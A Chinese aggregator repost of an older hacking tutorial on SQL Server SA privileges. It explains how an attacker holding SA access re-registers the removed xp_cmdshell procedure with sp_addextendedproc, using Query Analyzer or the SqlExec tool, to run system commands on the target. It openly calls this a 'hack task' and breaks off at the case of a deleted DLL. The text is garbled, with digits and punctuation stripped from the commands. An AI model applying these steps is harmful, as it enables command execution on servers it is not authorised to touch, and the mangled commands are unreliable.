知识大全 SQL Server SA权限总结经典技术

Posted 2022-07-15 语句

篇首语：遇到一些人，知道一些事，才能懂的理解与珍惜，才能看清自己的方向。本文由小常识网(cha138.com)小编为大家整理，主要介绍了知识大全 SQL Server SA权限总结经典技术相关的知识，希望对你有一定的参考价值。

SQL Server SA权限总结经典技术 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容，让我们赶快一起来看一下吧！

　　前提需要工具 SQL Query Analyzer和SqlExec Sunx Version　　　　 第一部分 　　　　有关去掉xp_cmdshell来保护系统的分析总结　　首先知道一下语句　　去掉xp_cmdshell扩展过程的方法是使用如下语句　　if exists (select * from dbo sysobjects where id=object_id(N [dbo] [xpcmdshell] ) and OBJECTPROPERTY(id N IsExtendedProc )= )exec sp_dropextendedproc N [dbo] [xp_cmdshell] 　　添加xp_cmdshell扩展过程的方法是使用如下语句　　sp_addextendedproc xp_cmdshell @dllname= xplog dll 　　现在看看现象　　我们在取得SA权限后远程用Sqlexec执行cmd命令出现提示SQL_ERROR 那么很可能是去掉了xp_cmdshell 　　　　现在来看看被去掉xp_cmdshell后恢复的两种方法　　　　方法一使用SQL Query Analyzer连接对方后直接写入挺方便sp_addextendedproc xp_cmdshell @dllname= xplog dll 方法二使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s 在CMD选项里输入sp_addextendedproc xp_cmdshell xpsql dll 或者对Sql 情况下使用sp_addextendedproc xp_cmdshell xplog dll 另外使用SqlExec Sunx Version来去除xp_cmdshell的方法和加的时候选择条件一样然后输入sp_dropextendedproc xp_cmdshell 就可以了　　　　 第二部分 　　　　假如对方已经把xplog dll删除或者改了名我们来用下面的方法继续我们的hack任务　　　　当出现如下现象暗示代表很有可能是xplog dll删除或者改了名　　　　在查询分析器中写入sp_addextendedproc xp_cmdshell @dllname= xplog dll 提示数据库中已存在名为 xp_cmdshell 的对象 cha138/Article/program/SQLServer/201311/22197